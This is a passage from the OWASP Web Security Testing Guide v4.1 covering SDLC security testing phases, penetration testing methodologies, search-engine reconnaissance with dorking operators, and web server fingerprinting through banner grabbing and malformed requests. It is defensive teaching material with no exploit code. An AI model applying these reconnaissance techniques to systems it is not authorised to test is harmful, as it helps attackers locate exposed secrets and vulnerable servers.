in. One of the</p><p>metrics that supports such analysis is the Return On Investment (ROI) in security. To derive such metrics from security</p><p>test data, it is important to quantify the differential between the risk, due to the exposure of vulnerabilities, and the</p><p>effectiveness of the security tests in mitigating the security risk, then factor this gap with the cost of the security testing</p><p>activity or the testing tools adopted.</p><p>Web Security Testing Guide v4.1</p><p>33</p><p>The OWASP Testing Framework</p><p>3.1 The Web Security Testing Framework</p><p>3.2 Phase 1 Before Development Begins</p><p>3.3 Phase 2 During Definition and Design</p><p>3.4 Phase 3 During Development</p><p>3.5 Phase 4 During Deployment</p><p>3.6 Phase 5 During Maintenance and Operations</p><p>3.7 A Typical SDLC Testing Workflow</p><p>3.8 Penetration Testing Methodologies</p><p>Web Security Testing Guide v4.1</p><p>34</p><p>The Web Security Testing Framework</p><p>Overview</p><p>This section describes a typical testing framework that can be developed within an organization. It can be seen as a</p><p>reference framework comprised of techniques and tasks that are appropriate at various phases of the software</p><p>development life cycle (SDLC). Companies and project teams can use this model to develop their own testing</p><p>framework, and to scope testing services from vendors. This framework should not be seen as prescriptive, but as a</p><p>flexible approach that can be extended and molded to fit an organization’s development process and culture.</p><p>This section aims to help organizations build a complete strategic testing process, and is not aimed at consultants or</p><p>contractors who tend to be engaged in more tactical, specific areas of testing.</p><p>It is critical to understand why building an end-to-end testing framework is crucial to assessing and improving software</p><p>security. In Writing Secure Code, Howard and LeBlanc note that issuing a security bulletin costs Microsoft at least</p><p>$100,000, and it costs their customers collectively far more than that to implement</p><p>the security patches. They also note</p><p>that the US government’s CyberCrime web site details recent criminal cases and the loss to organizations. Typical</p><p>losses far exceed USD $100,000.</p><p>With economics like this, it is little wonder why software vendors move from solely performing black-box security testing,</p><p>which can only be performed on applications that have already been developed, to concentrating on testing in the early</p><p>cycles of application development, such as during definition, design, and development.</p><p>Many security practitioners still see security testing in the realm of penetration testing. As discussed in the previous</p><p>chapter, while penetration testing has a role to play, it is generally inefficient at finding bugs and relies excessively on</p><p>the skill of the tester. It should only be considered as an implementation technique, or to raise awareness of production</p><p>issues. To improve the security of applications, the security quality of the software must be improved. That means</p><p>testing security during the definition, design, development, deployment, and maintenance stages, and not relying on</p><p>the costly strategy of waiting until code is completely built.</p><p>As discussed in the introduction of this document, there are many development methodologies, such as the Rational</p><p>Unified Process, eXtreme and Agile development, and traditional waterfall methodologies. The intent of this guide is to</p><p>suggest neither a particular development methodology, nor provide specific guidance that adheres to any particular</p><p>methodology. Instead, we are presenting a generic development model, and the reader should follow it according to</p><p>their company process.</p><p>This testing framework consists of activities that should take place:</p><p>Before development begins,</p><p>During definition and design,</p><p>During development,</p><p>During deployment, and</p><p>During maintenance and operations.</p><p>Phase 1 Before Development Begins</p><p>Phase 1.1 Define a SDLC</p><p>Before application development starts, an adequate SDLC must be defined where security is inherent at each stage.</p><p>Phase 1.2 Review Policies and Standards</p><p>Ensure that there are appropriate policies, standards, and documentation in place. Documentation is extremely</p><p>important as it gives development teams guidelines and policies that they can follow. People can only do the right thing</p><p>https://www.justice.gov/criminal-ccips</p><p>Web Security Testing Guide v4.1</p><p>35</p><p>if they know what the right thing is.</p><p>If the application is to be developed in Java, it is essential that there is a Java secure coding standard. If the application</p><p>is to use cryptography, it is essential that there is a cryptography standard. No policies or standards can cover every</p><p>situation that the development team will face. By documenting the common and predictable issues, there will be fewer</p><p>decisions that need to be made during the development process.</p><p>Phase 1.3 Develop Measurement and Metrics Criteria and Ensure Traceability</p><p>Before development begins, plan the measurement program. By defining criteria that need to be measured, it provides</p><p>visibility into defects in both the process and product. It is essential to define the metrics before development begins, as</p><p>there may be a need to modify the process in order to capture the data.</p><p>Phase 2 During Definition and Design</p><p>Phase 2.1 Review Security Requirements</p><p>Security requirements define how an application works from a security perspective. It is essential that the security</p><p>requirements are tested. Testing in this case means testing the assumptions that are made in the requirements and</p><p>testing to see if there are gaps in the requirements definitions.</p><p>For example, if there is a security requirement that states that users must be registered before they can get access to</p><p>the whitepapers section of a website, does this mean that the user must be registered with the system or should the</p><p>user be authenticated? Ensure that requirements are as unambiguous as possible.</p><p>When looking for requirements gaps, consider looking at security mechanisms such as:</p><p>User management</p><p>Authentication</p><p>Authorization</p><p>Data confidentiality</p><p>Integrity</p><p>Accountability</p><p>Session management</p><p>Transport security</p><p>Tiered system segregation</p><p>Legislative and standards compliance (including privacy, government, and industry standards)</p><p>Phase 2.2 Review Design and Architecture</p><p>Applications should have a documented design and architecture. This documentation can include models, textual</p><p>documents, and other similar artifacts. It is essential to test these artifacts to ensure that the design and architecture</p><p>enforce the appropriate level of security as defined in the requirements.</p><p>Identifying security flaws in the design phase is not only one of the most cost-efficient places to identify flaws, but can</p><p>be one of the most effective places to make changes. For example, if it is identified that the design calls for</p><p>authorization decisions to be made in multiple places, it may be appropriate to consider a central authorization</p><p>component. If the application is performing data validation at multiple places, it may be appropriate to develop a central</p><p>validation framework (ie, fixing input validation in one place, rather than in hundreds of places, is far cheaper).</p><p>If weaknesses are discovered, they should be given to the system architect for alternative approaches.</p><p>Phase 2.3 Create and Review UML Models</p><p>Once the design and architecture is complete, build Unified Modeling Language (UML) models that describe how the</p><p>application works. In some cases, these may already be available. Use these models to confirm with the systems</p><p>designers an exact understanding of how the application works. If weaknesses are discovered, they should be given to</p><p>the system architect for alternative approaches.</p><p>Web Security Testing Guide v4.1</p><p>36</p><p>Phase 2.4 Create and Review Threat Models</p><p>Armed with design and architecture reviews and the UML models explaining exactly how the system works, undertake</p><p>a threat modeling exercise. Develop realistic threat scenarios. Analyze the design and architecture to ensure that these</p><p>threats have been mitigated, accepted by the business, or assigned to a third party, such as an insurance firm. When</p><p>identified threats have no mitigation strategies, revisit the design and architecture with the systems architect to modify</p><p>the design.</p><p>Phase 3 During Development</p><p>Theoretically, development is the implementation of a design. However, in the real world, many design decisions are</p><p>made during code development. These are often smaller decisions that were either too detailed to be described in the</p><p>design, or issues where no policy or standard guidance was offered. If the design and architecture were not adequate,</p><p>the developer will be faced with many decisions. If there were insufficient policies and standards, the developer will be</p><p>faced with even more decisions.</p><p>Phase 3.1 Code Walk Through</p><p>The security team should perform a code walk through with the developers, and in some cases, the system architects. A</p><p>code walk through is a high-level walk through of the code where the developers can explain the logic and flow of the</p><p>implemented code. It allows the code review team to obtain a general understanding of the code, and allows the</p><p>developers to explain why certain things were developed the way they were.</p><p>The purpose is not to perform a code review, but to understand at a high level the flow, the layout, and the structure of</p><p>the code that makes up the application.</p><p>Phase 3.2 Code Reviews</p><p>Armed with a good understanding of how the code is structured and why certain things were coded the way they were,</p><p>the tester can now examine the actual code for security defects.</p><p>Static code reviews validate the code against a set of checklists, including:</p><p>Business requirements for availability, confidentiality, and integrity;</p><p>OWASP Guide or Top 10 Checklists for technical exposures (depending on the depth of the review);</p><p>Specific issues relating to the language or framework in use, such as the Scarlet paper for PHP or Microsoft Secure</p><p>Coding checklists</p><p>for ASP.NET; and</p><p>Any industry-specific requirements, such as Sarbanes-Oxley 404, COPPA, ISO/IEC 27002, APRA, HIPAA, Visa</p><p>Merchant guidelines, or other regulatory regimes.</p><p>In terms of return on resources invested (mostly time), static code reviews produce far higher quality returns than any</p><p>other security review method and rely least on the skill of the reviewer. However, they are not a silver bullet and need to</p><p>be considered carefully within a full-spectrum testing regime.</p><p>For more details on OWASP checklists, please refer to the latest edition of the OWASP Top 10.</p><p>Phase 4 During Deployment</p><p>Phase 4.1 Application Penetration Testing</p><p>Having tested the requirements, analyzed the design, and performed code review, it might be assumed that all issues</p><p>have been caught. Hopefully this is the case, but penetration testing the application after it has been deployed provides</p><p>an additional check to ensure that nothing has been missed.</p><p>Phase 4.2 Configuration Management Testing</p><p>The application penetration test should include an examination of how the infrastructure was deployed and secured. It</p><p>is important to review configuration aspects, no matter how small, to ensure that none are left at a default setting that</p><p>may be vulnerable to exploitation.</p><p>https://msdn.microsoft.com/en-us/library/ff648269.aspx</p><p>https://owasp.org/www-project-top-ten/</p><p>Web Security Testing Guide v4.1</p><p>37</p><p>Phase 5 During Maintenance and Operations</p><p>Phase 5.1 Conduct Operational Management Reviews</p><p>There needs to be a process in place which details how the operational side of both the application and infrastructure</p><p>is managed.</p><p>Phase 5.2 Conduct Periodic Health Checks</p><p>Monthly or quarterly health checks should be performed on both the application and infrastructure to ensure no new</p><p>security risks have been introduced and that the level of security is still intact.</p><p>Phase 5.3 Ensure Change Verification</p><p>After every change has been approved and tested in the QA environment and deployed into the production</p><p>environment, it is vital that the change is checked to ensure that the level of security has not been affected by the</p><p>change. This should be integrated into the change management process.</p><p>A Typical SDLC Testing Workflow</p><p>The following figure shows a typical SDLC Testing Workflow.</p><p>Web Security Testing Guide v4.1</p><p>38</p><p>Figure 3-1: Typical SDLC testing workflow</p><p>Web Security Testing Guide v4.1</p><p>39</p><p>Penetration Testing Methodologies</p><p>Summary</p><p>OWASP Testing Guide</p><p>PCI Penetration Testing Guide</p><p>Penetration Testing Execution Standard</p><p>NIST 800-115</p><p>Penetration Testing Framework</p><p>Information Systems Security Assessment Framework (ISSAF)</p><p>Open Source Security Testing Methodology Manual (OSSTMM)</p><p>Penetration Testing Execution Standard (PTES)</p><p>PTES defines penetration testing as 7 phases.</p><p>Pre-engagement Interactions</p><p>Intelligence Gathering</p><p>Threat Modeling</p><p>Vulnerability Analysis</p><p>Exploitation</p><p>Post Exploitation</p><p>Reporting</p><p>Instead of simply methodology or process, PTES also provides hands-on technical guidelines for what/how to test,</p><p>rationale of testing and recommended testing tools and usage.</p><p>PTES Technical Guidelines</p><p>PCI Penetration Testing Guide</p><p>Payment Card Industry Data Security Standard (PCI DSS) Requirement 11.3 defines the penetration testing. PCI also</p><p>defines Penetration Testing Guidance.</p><p>PCI DSS Penetration Testing Guidance</p><p>The PCI DSS Penetration testing guideline provides a very good reference of the following area while it’s not a hands-</p><p>on technical guideline to introduce testing tools.</p><p>Penetration Testing Components</p><p>Qualifications of a Penetration Tester</p><p>Penetration Testing Methodologies</p><p>Penetration Testing Reporting Guidelines</p><p>PCI DSS Penetration Testing Requirements</p><p>The PCI DSS requirement refer to Payment Card Industry Data Security Standard (PCI DSS) Requirement 11.3</p><p>Based on industry-accepted approaches</p><p>Coverage for CDE and critical systems</p><p>Includes external and internal testing</p><p>Test to validate scope reduction</p><p>http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines</p><p>Web Security Testing Guide v4.1</p><p>40</p><p>Application-layer testing</p><p>Network-layer tests for network and OS</p><p>Penetration Testing Framework</p><p>The Penetration testing framework provides very comprehensive hands-on penetration testing guide. It also list usage</p><p>of the testing tools in each testing category. The major area of penetration testing includes -</p><p>Network Footprinting (Reconnaissance)</p><p>Discovery & Probing</p><p>Enumeration</p><p>Password cracking</p><p>Vulnerability Assessment</p><p>AS/400 Auditing</p><p>Bluetooth Specific Testing</p><p>Cisco Specific Testing</p><p>Citrix Specific Testing</p><p>Network Backbone</p><p>Server Specific Tests</p><p>VoIP Security</p><p>Wireless Penetration</p><p>Physical Security</p><p>Final Report - template</p><p>Penetration Testing Framework</p><p>Technical Guide to Information Security Testing and Assessment (NIST800-115)</p><p>Information Systems Security Assessment Framework (ISSAF)</p><p>The ISSAF is a very good reference source of penetration testing though Information Systems Security Assessment</p><p>Framework (ISSAF) is not an active community. It provides comprehensive penetration testing technical guidance. It</p><p>covers the area below.</p><p>Project Management</p><p>Guidelines And Best Practices - Pre-Assessment, Assessment And Post Assessment</p><p>Assessment Methodology</p><p>Review Of Information Security Policy And Security Organization</p><p>Evaluation Of Risk Assessment Methodology</p><p>Technical Control Assessment</p><p>Technical Control Assessment - Methodology</p><p>Password Security</p><p>Password Cracking Strategies</p><p>Unix /Linux System Security Assessment</p><p>Windows System Security Assessment</p><p>Novell Netware Security Assessment</p><p>Database Security Assessment</p><p>Wireless Security Assessment</p><p>Switch Security Assessment</p><p>Router Security Assessment</p><p>Firewall Security Assessment</p><p>http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html</p><p>Web Security Testing Guide v4.1</p><p>41</p><p>Intrusion Detection System Security Assessment</p><p>VPN Security Assessment</p><p>Anti-Virus System Security Assessment And Management Strategy</p><p>Web Application Security Assessment</p><p>Storage Area Network (SAN) Security</p><p>Internet User Security</p><p>As 400 Security</p><p>Source Code Auditing</p><p>Binary Auditing</p><p>Social Engineering</p><p>Physical Security Assessment</p><p>Incident Analysis</p><p>Review Of Logging / Monitoring & Auditing Processes</p><p>Business Continuity Planning And Disaster Recovery</p><p>Security Awareness And Training</p><p>Outsourcing Security Concerns</p><p>Knowledge Base</p><p>Legal Aspects Of Security Assessment Projects</p><p>Non-Disclosure Agreement (NDA)</p><p>Security Assessment Contract</p><p>Request For Proposal Template</p><p>Desktop Security Check-List - Windows</p><p>Linux Security Check-List</p><p>Solaris Operating System Security Check-List</p><p>Default Ports - Firewall</p><p>Default Ports - IDS/IPS</p><p>Links</p><p>Penetration Testing Lab Design</p><p>Open Source Security Testing Methodology Manual (OSSTMM)</p><p>OSSTMM is a methodology to test the operational security of physical locations, workflow, human security testing,</p><p>physical security testing, wireless security testing, telecommunication security testing, data networks security testing</p><p>and compliance. OSSTMM can be supporting reference of IOS 27001 instead of a hands-on penetration testing guide.</p><p>OSSTMM includes the following key sections:</p><p>Operational Security Metrics</p><p>Trust Analysis</p><p>Work Flow.</p><p>Human Security Testing</p><p>Physical Security Testing</p><p>Wireless Security Testing</p><p>Telecommunications Security Testing</p><p>Data Networks Security Testing</p><p>Compliance Regulations</p><p>Reporting with the STAR (Security Test Audit Report)</p><p>References</p><p>Web Security Testing Guide v4.1</p><p>42</p><p>PCI Data Security Standard - Penetration TestingGuidance</p><p>Pentest Standard</p><p>Open Source Security Testing Methodology Manual (OSSTMM)</p><p>NIST - SP 800-115</p><p>HIPAA 2012</p><p>Penetration Testing Framework 0.59</p><p>OWASP Mobile Security Testing Guide</p><p>Security Testing Guidelines for Mobile Apps</p><p>Kali</p><p>ISSTF</p><p>Information Supplement: Requirement 11.3 Penetration Testing</p><p>https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf</p><p>http://www.pentest-standard.org/index.php/Main_Page</p><p>http://www.isecom.org/research/osstmm.html</p><p>https://csrc.nist.gov/publications/detail/sp/800-115/final</p><p>http://csrc.nist.gov/news_events/hiipaa_june2012/day2/day2-6_kscarfone-rmetzer_security-testing-assessment.pdf</p><p>http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html</p><p>https://owasp.org/www-project-mobile-security-testing-guide/</p><p>https://owasp.org/www-pdf-archive/Security_Testing_Guidelines_for_mobile_Apps_-_Florian_Stahl%2BJohannes_Stroeher.pdf</p><p>https://www.kali.org/</p><p>https://sourceforge.net/projects/isstf/files/issaf%20document/issaf0.1/</p><p>https://www.pcisecuritystandards.org/pdfs/infosupp_11_3_penetration_testing.pdf</p><p>Web Security Testing Guide v4.1</p><p>43</p><p>Web Application Security Testing</p><p>4.0 Introduction and Objectives</p><p>4.1 Information Gathering</p><p>4.2 Configuration and Deployment Management Testing</p><p>4.3 Identity Management Testing</p><p>4.4 Authentication Testing</p><p>4.5 Authorization Testing</p><p>4.6 Session Management Testing</p><p>4.7 Input Validation Testing</p><p>4.8 Testing for Error Handling</p><p>4.9 Testing for Weak Cryptography</p><p>4.10 Business Logic Testing</p><p>4.11 Client Side Testing</p><p>Web Security Testing Guide v4.1</p><p>44</p><p>4.0 Introduction and Objectives</p><p>This section describes the OWASP web application security testing methodology and explains how to test for evidence</p><p>of vulnerabilities within the application due to deficiencies with identified security controls.</p><p>What is Web Application Security Testing?</p><p>A security test is a method of evaluating the security of a computer system or network by methodically validating and</p><p>verifying the effectiveness of application security controls. A web application security test focuses only on evaluating</p><p>the security of a web application. The process involves an active analysis of the application for any weaknesses,</p><p>technical flaws, or vulnerabilities. Any security issues that are found will be presented to the system owner, together</p><p>with an assessment of the impact, a proposal for mitigation or a technical solution.</p><p>What is a Vulnerability?</p><p>A vulnerability is a flaw or weakness in a system’s design, implementation, operation or management that could be</p><p>exploited to compromise the system’s security objectives.</p><p>What is a Threat?</p><p>A threat is anything (a malicious external attacker, an internal user, a system instability, etc) that may harm the assets</p><p>owned by an application (resources of value, such as the data in a database or in the file system) by exploiting a</p><p>vulnerability.</p><p>What is a Test?</p><p>A test is an action to demonstrate that an application meets the security requirements of its stakeholders.</p><p>The Approach in Writing this Guide</p><p>The OWASP approach is open and collaborative:</p><p>Open: every security expert can participate with his or her experience in the project. Everything is free.</p><p>Collaborative: brainstorming is performed before the articles are written so the team can share ideas and develop</p><p>a collective vision of the project. That means rough consensus, a wider audience and increased participation.</p><p>This approach tends to create a defined Testing Methodology that will be:</p><p>Consistent</p><p>Reproducible</p><p>Rigorous</p><p>Under quality control</p><p>The problems to be addressed are fully documented and tested. It is important to use a method to test all known</p><p>vulnerabilities and document all the security test activities.</p><p>What Is the OWASP Testing Methodology?</p><p>Security testing will never be an exact science where a complete list of all possible issues that should be tested can be</p><p>defined. Indeed, security testing is only an appropriate technique for testing the security of web applications under</p><p>certain circumstances. The goal of this project is to collect all the possible testing techniques, explain these techniques,</p><p>and keep the guide updated. The OWASP Web Application Security Testing method is based on the black box</p><p>approach. The tester knows nothing or has very little information about the application to be tested.</p><p>The testing model consists of:</p><p>Web Security Testing Guide v4.1</p><p>45</p><p>Tester: Who performs the testing activities</p><p>Tools and methodology: The core of this Testing Guide project</p><p>Application: The black box to test</p><p>Testing can be categorized as passive or active:</p><p>Passive Testing</p><p>During passive testing, a tester tries to understand the application’s logic and explores the application as a user. Tools</p><p>can be used for information gathering. For example, an HTTP proxy can be used to observe all the HTTP requests and</p><p>responses. At the end of this phase, the tester should understand all the access points (gates) of the application (e.g.,</p><p>HTTP headers, parameters, and cookies). The Information Gathering section explains how to perform passive testing.</p><p>For example, a tester may find a page at the following URL:</p><p>https://www.example.com/login/Authentic_Form.html</p><p>This may indicate an authentication form where the application requests a username and a password.</p><p>The following parameters represent two access points (gates) to the application:</p><p>http://www.example.com/Appx.jsp?a=1&b=1</p><p>In this case, the application shows two gates (parameters a and b). All the gates found in this phase represent a point of</p><p>testing. A spreadsheet with the directory tree of the application and all the access points may be useful during active</p><p>testing.</p><p>Active Testing</p><p>During active testing, a tester begins to use the methodologies described in the follow sections.</p><p>The set of active tests have been split into 11 sub-categories for a total of 91 controls:</p><p>Configuration and Deployment Management Testing</p><p>Identity Management Testing</p><p>Authentication Testing</p><p>Authorization Testing</p><p>Session Management Testing</p><p>Input Validation Testing</p><p>Error Handling</p><p>Cryptography</p><p>Business Logic Testing</p><p>Client Side Testing</p><p>Web Security Testing Guide v4.1</p><p>46</p><p>4.1 Information Gathering</p><p>4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage</p><p>4.1.2 Fingerprint Web Server</p><p>4.1.3 Review Webserver Metafiles for Information Leakage</p><p>4.1.4 Enumerate Applications on Webserver</p><p>4.1.5 Review Webpage Comments and Metadata for Information Leakage</p><p>4.1.6 Identify Application Entry Points</p><p>4.1.7 Map Execution Paths Through Application</p><p>4.1.8 Fingerprint Web Application Framework</p><p>4.1.9 Fingerprint Web Application</p><p>4.1.10 Map Application Architecture</p><p>Web Security Testing Guide v4.1</p><p>47</p><p>Conduct Search Engine Discovery Reconnaissance for</p><p>Information Leakage</p><p>ID</p><p>WSTG-INFO-01</p><p>Summary</p><p>In order for search engines to work, computer programs (or “robots”) regularly fetch data (referred to as crawling from</p><p>billions of pages on the web. These programs find web pages by following links from other pages, or by looking at</p><p>sitemaps. If a website uses a special file called “robots.txt” to list pages that it does not want search engines to fetch,</p><p>then the pages listed there will be ignored. This is a basic overview - Google offers a more in-depth explanation of how</p><p>a search engine works.</p><p>Testers can use search engines to perform reconnaissance on websites and web applications. There are direct and</p><p>indirect elements to search engine discovery and reconnaissance: direct methods relate to searching the indexes and</p><p>the associated content from caches, while indirect methods relate to learning sensitive design and configuration</p><p>information by searching forums, newsgroups, and tendering websites.</p><p>Once a search engine robot has completed crawling, it commences indexing the web page based on tags and</p><p>associated attributes, such as <TITLE> , in order to return the relevant search results. If the robots.txt file is not updated</p><p>during the lifetime of the web site, and inline HTML meta tags that instruct robots not to index content have not been</p><p>used, then it is possible for indexes to contain web content not intended to be included by the owners. Website owners</p><p>may use the previously mentioned robots.txt, HTML meta tags, authentication, and tools provided by search engines to</p><p>remove such content.</p><p>Test Objectives</p><p>To understand what sensitive design and configuration information of the application, system, or organization is</p><p>exposed both directly (on the organization’s website) or indirectly (on a third party website).</p><p>How to Test</p><p>Use a search engine to search for potentially sensitive information. This may include:</p><p>network diagrams and configurations;</p><p>archived posts and emails by administrators and other key staff;</p><p>log on procedures and username formats;</p><p>usernames, passwords, and private keys;</p><p>third-party, or cloud service configuration files;</p><p>revealing error message content; and</p><p>development, test, user acceptance testing (UAT), and staging versions of the website.</p><p>Search Engines</p><p>Do not limit testing to just one search engine provider, as different search engines may generate different results.</p><p>Search engine results can vary in a few ways, depending on when the engine last crawled content, and the algorithm</p><p>the engine uses to determine relevant pages. Consider using the following (alphabetically-listed) search engines:</p><p>Baidu, China’s most popular search engine.</p><p>Bing, a search engine owned and operated by Microsoft, and the second most popular worldwide. Supports</p><p>advanced search keywords.</p><p>https://en.wikipedia.org/wiki/Web_crawler</p><p>https://support.google.com/webmasters/answer/70897?hl=en</p><p>https://www.baidu.com/</p><p>https://en.wikipedia.org/wiki/Web_search_engine#Market_share</p><p>https://www.bing.com/</p><p>https://en.wikipedia.org/wiki/Web_search_engine#Market_share</p><p>http://help.bing.microsoft.com/#apex/18/en-US/10001/-1</p><p>Web Security Testing Guide v4.1</p><p>48</p><p>binsearch.info, a search engine for binary Usenet newsgroups.</p><p>DuckDuckGo, a privacy-focused search engine that compiles results from many different sources. Supports search</p><p>syntax.</p><p>Google, which offers the world’s most popular search engine, and uses a ranking system to attempt to return the</p><p>most relevant results. Supports search operators.</p><p>Startpage, a search engine that uses Google’s results without collecting personal information through trackers and</p><p>logs. Supports search operators.</p><p>Shodan, a service for searching Internet-connected devices and services. Usage options include a limited free</p><p>plan as well as paid subscription plans.</p><p>Both DuckDuckGo and Startpage offer some increased privacy to users by not utilizing trackers or keeping logs. This</p><p>can provide reduced information leakage about the tester.</p><p>Search Operators</p><p>A search operator is a special keyword that extends the capabilities of regular search queries, and can help obtain</p><p>more specific results. They generally take the form of operator:query . Here are some commonly supported search</p><p>operators:</p><p>site: will limit the search to the provided URL.</p><p>inurl: will only return results that include the keyword in the URL.</p><p>intitle: will only return results that have the keyword in the page title.</p><p>intext: or inbody: will only search for the keyword in the body of pages.</p><p>filetype: will match only a specific filetype, i.e. png, or php.</p><p>For example, to find the web content of owasp.org as indexed by a typical search engine, the syntax required is:</p><p>site:owasp.org</p><p>Figure 4.1.1-1: Google Site Operation Search Result Example</p><p>Viewing Cached Content</p><p>To search for content that has previously been indexed, use the cache: operator. This is helpful for viewing content</p><p>that may have changed since the time it was indexed, or that may no longer be available. Not all search engines</p><p>provide cached content to search; the most useful source at time of writing is Google.</p><p>https://binsearch.info/</p><p>https://duckduckgo.com/</p><p>https://help.duckduckgo.com/results/sources/</p><p>https://help.duckduckgo.com/duckduckgo-help-pages/results/syntax/</p><p>https://www.google.com/</p><p>https://en.wikipedia.org/wiki/Web_search_engine#Market_share</p><p>https://support.google.com/websearch/answer/2466433</p><p>https://www.startpage.com/</p><p>https://support.startpage.com/index.php?/Knowledgebase/Article/View/989/0/advanced-search-which-search-operators-are-supported-by-startpagecom</p><p>https://www.shodan.io/</p><p>Web Security Testing Guide v4.1</p><p>49</p><p>To view owasp.org as it is cached, the syntax is:</p><p>cache:owasp.org</p><p>Figure 4.1.1-2: Google Cache Operation Search Result Example</p><p>Google Hacking, or Dorking</p><p>Searching with operators can be a very effective discovery reconnaissance technique when combined with the</p><p>creativity of the tester. Operators can be chained to effectively discover specific kinds of sensitive files and information.</p><p>This technique, called Google hacking or Google dorking, is also possible using other search engines, as long as the</p><p>search operators are supported.</p><p>A database of dorks, such as Google Hacking Database, is a useful resource that can help uncover specific</p><p>information. Some categories of dorks available on this database include:</p><p>Footholds</p><p>Files containing usernames</p><p>Sensitive Directories</p><p>Web Server Detection</p><p>Vulnerable Files</p><p>Vulnerable Servers</p><p>Error Messages</p><p>Files containing juicy info</p><p>Files containing passwords</p><p>Sensitive Online Shopping Info</p><p>Databases for other search engines, such as Bing and Shodan, are available from resources such as Bishop Fox’s</p><p>Google Hacking Diggity Project.</p><p>Remediation</p><p>Carefully consider the sensitivity of design and configuration information before it is posted online.</p><p>Periodically review the sensitivity of existing design and configuration information that is posted online.</p><p>https://en.wikipedia.org/wiki/Google_hacking</p><p>https://www.exploit-db.com/google-hacking-database</p><p>https://resources.bishopfox.com/resources/tools/google-hacking-diggity/</p><p>Web Security Testing Guide v4.1</p><p>50</p><p>Fingerprint Web Server</p><p>ID</p><p>WSTG-INFO-02</p><p>Summary</p><p>Web server fingerprinting is the task of identifying the type and version of web server that a target is running on. While</p><p>web server fingerprinting is often encapsulated in automated testing tools, it is important for researchers to understand</p><p>the fundamentals of how these tools attempt to identify software, and why this is useful.</p><p>Accurately discovering the type of web server that an application runs on can enable security testers to determine if the</p><p>application is vulnerable to attack. In particular, servers running older versions of software without up-to-date security</p><p>patches can be susceptible to known version-specific exploits.</p><p>Test Objectives</p><p>Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.</p><p>How to Test</p><p>Techniques used for web server fingerprinting include banner grabbing, eliciting responses to malformed requests, and</p><p>using automated tools to perform more robust scans that use a combination of tactics. The fundamental premise by</p><p>which all these techniques operate is the same. They all strive to elicit some response from the web server which can</p><p>then be compared to a database of known responses and behaviors, and thus matched to a known server type.</p><p>Banner Grabbing</p><p>A banner grab is performed by sending an HTTP request to the web server and examining its response header. This</p><p>can be accomplished using a variety of tools, including telnet for HTTP requests, or openssl for requests over SSL.</p><p>For example, here is the response to a request from an Apache server.</p><p>HTTP/1.1 200 OK</p><p>Date: Thu, 05 Sep 2019 17:42:39 GMT</p><p>Server: Apache/2.4.41 (Unix)</p><p>Last-Modified: Thu, 05 Sep 2019 17:40:42 GMT</p><p>ETag: "75-591d1d21b6167"</p><p>Accept-Ranges: bytes</p><p>Content-Length: 117</p><p>Connection: close</p><p>Content-Type: text/html</p><p>...</p><p>Here is another response, this time from nginx.</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.17.3</p><p>Date: Thu, 05 Sep 2019 17:50:24 GMT</p><p>Content-Type: text/html</p><p>Content-Length: 117</p><p>Last-Modified: Thu, 05 Sep 2019 17:40:42 GMT</p><p>Connection: close</p><p>ETag: "5d71489a-75"</p><p>Accept-Ranges: bytes</p><p>...</p><p>https://en.wikipedia.org/wiki/Banner_grabbing</p><p>https://developer.mozilla.org/en-US/docs/Glossary/Response_header</p><p>Web Security Testing Guide v4.1</p><p>51</p><p>Here’s what a response from lighttpd looks like.</p><p>HTTP/1.0 200 OK</p><p>Content-Type: text/html</p><p>Accept-Ranges: bytes</p><p>ETag: "4192788355"</p><p>Last-Modified: Thu, 05 Sep 2019 17:40:42 GMT</p><p>Content-Length: 117</p><p>Connection: close</p><p>Date: Thu, 05 Sep 2019 17:57:57 GMT</p><p>Server: lighttpd/1.4.54</p><p>In these examples, the server type and version is clearly exposed. However, security-conscious applications may</p><p>obfuscate their server information by modifying the header. For example, here is an excerpt from the response to a</p><p>request for a site with a modified header:</p><p>HTTP/1.1 200 OK</p><p>Server: Website.com</p><p>Date: Thu, 05 Sep 2019 17:57:06 GMT</p><p>Content-Type: text/html; charset=utf-8</p><p>Status: 200 OK</p><p>...</p><p>In cases where the server information is obscured, testers may guess the type of server based on the ordering of the</p><p>header fields. Note that in the Apache example above, the fields follow this order:</p><p>Date</p><p>Server</p><p>Last-Modified</p><p>ETag</p><p>Accept-Ranges</p><p>Content-Length</p><p>Connection</p><p>Content-Type</p><p>However, in both the nginx and obscured server examples, the fields in common follow this order:</p><p>Server</p><p>Date</p><p>Content-Type</p><p>Testers can use this information to guess that the obscured server is nginx. However, considering that a number of</p><p>different web servers may share the same field ordering and fields can be modified or removed, this method is not</p><p>definite.</p><p>Sending Malformed Requests</p><p>Web servers may be identified by examining their error responses, and in the cases where they have not been</p><p>customized, their default error pages. One way to compel a server to present these is by sending intentionally incorrect</p><p>or malformed requests.</p><p>For example, here is the response to a request for the non-existent method SANTA CLAUS from an Apache server.</p><p>Web Security Testing Guide v4.1</p><p>52</p><p>GET / SANTA CLAUS/1.1</p><p>HTTP/1.1 400 Bad Request</p><p>Date: Fri, 06 Sep 2019 19:21:01 GMT</p><p>Server: Apache/2.4.41 (Unix)</p><p>Content-Length: 226</p><p>Connection: close</p><p>Content-Type: text/html; charset=iso-8859-1</p><p><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"></p><p><html><head></p><p><title>400 Bad Request</title></p><p></head><body></p><p><h1>Bad Request</h1></p><p><p>Your browser sent a request that this server could not understand.<br /></p><p></p></p><p></body></html></p><p>Here is the response to the same request from nginx.</p><p>GET / SANTA CLAUS/1.1</p><p><html></p><p><head><title>404 Not Found</title></head></p><p><body></p><p><center><h1>404 Not Found</h1></center></p><p><hr><center>nginx/1.17.3</center></p><p></body></p><p></html></p><p>Here is the response to the same request from lighttpd.</p><p>GET / SANTA CLAUS/1.1</p><p>HTTP/1.0 400 Bad Request</p><p>Content-Type: text/html</p><p>Content-Length: 345</p><p>Connection: close</p><p>Date: Sun, 08 Sep 2019 21:56:17 GMT</p><p>Server: lighttpd/1.4.54</p><p><?xml version="1.0" encoding="iso-8859-1"?></p><p><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"</p><p>"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"></p><p><html xmlns="http://www.w3.org/1999/xhtml" 